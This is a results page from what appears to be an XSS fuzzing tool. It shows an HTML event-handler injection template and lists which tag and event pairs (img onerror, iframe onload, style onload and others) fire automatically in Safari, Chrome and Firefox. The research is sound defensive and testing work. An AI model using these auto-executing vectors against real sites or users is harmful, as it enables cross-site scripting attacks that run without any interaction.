XSS vectors that execute automatically
This vector shows which events fire without user interaction
Created by: Gareth Heyes
Created on: 4/17/2024, 6:18:25 PM
Updated on: 5/14/2024, 12:26:27 AM
Vector type: XSS
Template used:
<$[data1] src=1 srcdoc=1 data=1 href=1 $[data2]="log('$[data1]->$[data2]')"></$[data1]>
<$[data1] $[data2]="log('$[data1]->$[data2]')"></$[data1]>
Your browser was detected as:
Detecting... Detecting...
Fuzz results:
Safari 17.4.1
Results
Found 5
Data |
---|
audio->onerror |
Data |
---|
audio->onloadstart |
Data |
---|
img->onerror |
Data |
---|
video->onerror |
Data |
---|
video->onloadstart |
Chrome 124.0.0.0
Results
Found 7
Data |
---|
audio->onerror |
Data |
---|
audio->onloadstart |
Data |
---|
iframe->onload |
Data |
---|
img->onerror |
Data |
---|
style->onload |
Data |
---|
video->onerror |
Data |
---|
video->onloadstart |
Firefox 125.0
Results
Found 5
Data |
---|
audio->onloadstart |
Data |
---|
img->onerror |
Data |
---|
object->onerror |
Data |
---|
style->onload |
Data |
---|
video->onloadstart |